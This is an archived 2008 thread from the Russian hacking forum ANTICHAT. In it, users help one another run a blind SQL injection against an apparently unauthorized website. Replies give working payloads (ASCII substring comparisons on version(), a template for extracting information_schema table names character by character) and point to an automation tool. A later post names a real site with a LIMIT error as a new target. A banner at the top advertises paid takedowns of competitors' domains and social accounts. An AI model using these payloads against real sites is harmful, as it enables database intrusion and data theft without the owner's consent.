УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
помогите составить запрос !

Опции темы

Поиск в этой теме

Опции просмотра

помогите составить запрос !

19.06.2008, 19:50

stigmatus

Новичок

Регистрация: 26.04.2008

Сообщений: 23

Провел на форуме:
53043

Репутация: 0

помогите составить запрос !

есть бажнии саит ! слепая sql injection!

пример :

Цитата:

http://********/concurs.php?id=4+AND+substring(version(),1,1)=5

резулитат : TRUE

а если :

Цитата:

http://*******/concurs.php?id=4+AND+ascii(lower(substring(version (),1,1)))=5

резулитат : FALSE

почему ????

читал статию http://injection.rulezz.ru/mysql_char_brute.html но чёта не как там описано ! help!

19.06.2008, 19:58

spider-intruder

Постоянный

Регистрация: 10.12.2005

Сообщений: 939

Провел на форуме:
3886281

Репутация: 929

Отправить сообщение для spider-intruder с помощью ICQ

потому что код 5ки во втором запросе должен быть 53

http://*******/concurs.php?id=4+AND+ascii(lower(substring(version (),1,1)))=53

Ты приводиш первый символ значения переменной version() к типу ASCII т.е. к ее коду а он равен 53

Последний раз редактировалось spider-intruder; 19.06.2008 в 20:02..

19.06.2008, 20:04

stigmatus

Новичок

Регистрация: 26.04.2008

Сообщений: 23

Провел на форуме:
53043

Репутация: 0

посиба ! подскажи как составить запрос типа : SELECT table_name from information_schema.tables

19.06.2008, 20:05

stigmatus

Новичок

Регистрация: 26.04.2008

Сообщений: 23

Провел на форуме:
53043

Репутация: 0

на том же примере ???

19.06.2008, 20:08

spider-intruder

Постоянный

Регистрация: 10.12.2005

Сообщений: 939

Провел на форуме:
3886281

Репутация: 929

http://*******/concurs.php?id=4+AND+ascii(lower(substring("ЗАП РОС",1,1)))="ПЕРЕБИРАТЬ каждую букву методом схождения"

гдето есть софт для автоматизации процесса даже по слепой инъекции - ищите.
мне некогда )

19.06.2008, 23:47

Ch3ck

Познавший АНТИЧАТ

Регистрация: 09.06.2006

Сообщений: 1,359

Провел на форуме:
5301021

Репутация: 1879

Bsqlbf2
_https://forum.antichat.ru/threadnav20879-1-10.html

Последний раз редактировалось Ch3ck; 19.06.2008 в 23:50..

21.06.2008, 00:36

XJIOP

Познающий

Регистрация: 23.03.2005

Сообщений: 40

Провел на форуме:
44404

Репутация: 13

Отправить сообщение для XJIOP с помощью ICQ

народ что можно сдеалть с ошибкой в LIMIT? вот пример где ошибка http://mybits.ws:80/browse.php?page=0.01

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Помогите составить регулярное выражение.	x88x	PHP, PERL, MySQL, JavaScript	7	12.06.2008 18:27
Нужно составить правильный запрос, для веб-формы (https)	geograph	Разное - Покупка, продажа, обмен	0	31.12.2007 13:09
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход